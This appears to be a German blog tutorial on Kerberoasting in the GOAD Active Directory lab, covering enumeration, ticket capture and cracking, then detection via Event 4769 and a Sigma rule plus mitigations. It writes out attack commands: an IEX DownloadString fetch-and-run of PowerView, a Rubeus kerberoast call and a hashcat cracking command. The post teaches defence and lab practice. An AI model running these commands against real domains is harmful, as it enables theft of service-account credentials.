Active Directory Pentest: Kerberoasting Schritt fuer Schritt im GOAD Lab

Kerberoasting toetet 2026 weiterhin Domains, weil Teams Service Accounts mit schwachen Passwoertern erzeugen und SPNs auf DCs registrieren, ohne MFA durchzusetzen. In unserem Game of Active Directory Lab (GOAD v3) brauchten wir rund 14 Minuten vom initialen Shell auf einer Memberbox in sevenkingdoms.local bis zum geknackten Passwort eines SQL-Server-Dienstkontos mit hashcat auf einer RTX 4070. Dieser Post dokumentiert den kompletten Ablauf, von der Enumeration mit PowerView bis zur Sigma-Regel, die den Angriff im ELK-Stack des Blue Teams erkennt. Alles isoliert, snapshotgesichert und weit weg von fremden Produktionssystemen.

Bevor du GOAD anfasst, repliziere die Netzsegmentierung aus Web-Pentest von Null: Ein Sicheres Lab mit DVWA, Juice Shop und Burp Suite Bauen und gehe OPSEC fuer Security-Researcher: Persoenliches Bedrohungsmodell durch, damit von deinem Arbeitsplatz keine Artefakte nach draussen lecken. Unser GOAD laeuft auf drei VMs mit jeweils 6 GB RAM (DC01, DC02, SRV02) plus einem dedizierten Kali mit 8 GB auf vmnet9. Nutze Mayfly277s offizielles Ansible-Playbook, es provisioniert auf einer ordentlichen Maschine in etwa 45 Minuten. Stelle sicher, dass die Windows-Firewall intern permissiv ist, sonst debuggst du RPC-Probleme statt Kerberos zu studieren.

Die Enumeration startet nach dem Initial Access. Angenommen du hast bereits Low-Priv-Credentials ueber Techniken aus Initial Access Simuliert: Makros, LNK und ISO im Isolierten Windows-11-Lab, in unserem Fall jaime.lannister:cersei. Wir laden PowerView.ps1 mit `IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/PowerView.ps1')` und feuern `Get-DomainUser -SPN | select samaccountname, serviceprincipalname`. Drei Konten erscheinen: sqlsvc, httpsvc, backupsvc. Das natuerliche Ziel ist sqlsvc, weil MSSQL-Dienstkonten oft mit kurzen Passwoertern aus 2018er Installationsskripten geboren wurden. Rubeus.exe ist unser Capture-Tool: `Rubeus.exe kerberoast /nowrap /outfile:hashes.txt /user:sqlsvc`.

Das zurueckgegebene TGS ist mit dem NTLM-Hash des Dienstkonto-Passworts verschluesselt, in den meisten Labs und leider auch in viel Produktion als RC4-HMAC (etype 23). Hol dir hashes.txt, schiebe sie via SMB oder curl nach Kali und fuettere hashcat: `hashcat -m 13100 hashes.txt rockyou.txt -r rules/best64.rule`. Nach 2 Minuten 11 Sekunden fiel SQLSvc@2018. Wer mit groesseren Wordlists spielen will, ist mit OneRuleToRuleThemStill gut bedient, aber fang basic an. Zur Korrelation mit benachbarten AD-Techniken sieh dir Lateral Movement im Lab: SMB, WMI und WinRM mit Detection-Fokus und vor allem Windows-Persistenz: 10 Dokumentierte Techniken und ihre Gegenmassnahmen fuer den Folgeschritt an.

Auf der Blue-Team-Seite ist Kerberoasting nicht leise, wenn man weiss, wo man hinschaut. Event ID 4769 auf dem DC loggt jedes ausgegebene Service Ticket, und ein Ticket Encryption Type von 0x17 (RC4) ist in modernen AES-Umgebungen bereits eine Warnflagge. Die Sigma-Regel, die ich geschrieben habe, beobachtet 4769 mit TicketEncryption 0x17 ODER 0x18, gruppiert nach Quelluser in einem 60-Sekunden-Fenster und feuert ab 5 verschiedenen angefragten SPNs. Das filtert das Rauschen legitimer Applikationen heraus. Zur Instrumentierung zeigt Threat Hunting mit Sigma und Elastic: Vom Indikator zur Detektionsregel die Pipeline mit Filebeat und Elastic, und Hunting von Living-off-the-Land-Binaries unter Windows mit KQL deckt angrenzende Detections fuer Defender for Identity ab.

Praktische Mitigation laeuft in Schichten. Erstens, migriere jedes Dienstkonto auf Group Managed Service Accounts (gMSA) mit automatischer 30-Tage-Rotation, das toetet das nuetzliche Offline-Crack-Fenster. Zweitens, erzwinge AES256_HMAC_SHA1, indem du RC4 in msDS-SupportedEncryptionTypes deaktivierst (Wert 0x18). Drittens, auditiere monatlich mit `Get-ADUser -Filter {ServicePrincipalName -ne $null} -Properties PasswordLastSet, msDS-SupportedEncryptionTypes` und markiere jedes Konto mit Passwort aelter als 90 Tage. Viertens, aktiviere die Protected Users Group fuer jedes Admin-Konto mit SPN. Fuer komplementaeres Endpoint-Hardening deckt Windows 11 Hardening fuer Hochrisiko Arbeitsplaetze die Administrator-Workstation ab.

Praktisches Takeaway: richte heute einen SIEM-Alert ein, der ausloest, sobald ein einzelnes Konto mehr als 4 verschiedene RC4 Service Tickets in 5 Minuten anfragt, und gleiche das mit einer Allowlist erwarteter Dienstkonten ab. Zwei Stunden Arbeit, und es haette 8 von 10 echten Kerberoasting-Angriffen aus oeffentlichen IR-Reports von 2025 erwischt. Dokumentiere das Playbook, trainiere das Team am lokal reproduzierten GOAD und ueberpruefe die Posture bei jedem neu erzeugten SPN in der Domain. Andernfalls kommen die naechsten Kopfschmerzen womoeglich genau aus diesem Vektor.